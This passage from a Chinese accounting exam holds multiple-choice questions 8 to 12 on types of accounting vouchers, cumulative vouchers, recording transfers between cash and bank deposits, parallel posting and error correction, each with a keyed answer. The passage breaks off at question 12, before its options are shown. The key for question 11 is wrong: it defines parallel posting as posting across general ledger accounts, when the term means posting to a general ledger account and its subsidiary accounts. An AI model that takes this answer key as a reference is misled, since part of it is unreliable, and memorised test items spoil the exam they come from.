8.将会计凭证划分为原始凭证和记账凭证两大类的依据是( C ) A.填制的时间 B.填制的方法 C.填制的程序和用途 D.凭证反映的经济内容 9.在一定时期内连续记载许多同类经济业务的会计凭证,称为( B ) A.原始凭证汇总表 B.累计凭证 C.汇总凭证 D.复式凭证 10.在采用收款凭证、付款凭证和转账凭证的情况下,涉及到现金和银行存款之间的划转业务,按规定( B ) A.只填收款凭证 B.只填付款凭证 C.既填收款凭证又填付款凭证 D.只填转账凭证 11.平行登记法是指同一项经济业务在( B ) A.汇总凭证与有关账户之间登记 B.各有关总分类账户中登记 C.各有关明细分类账户中登记 D.总账及其所属明细账户之间登记 12.在结账之前,如果发现账簿记录有错误,而记账凭证填制正确,更正时可用( D )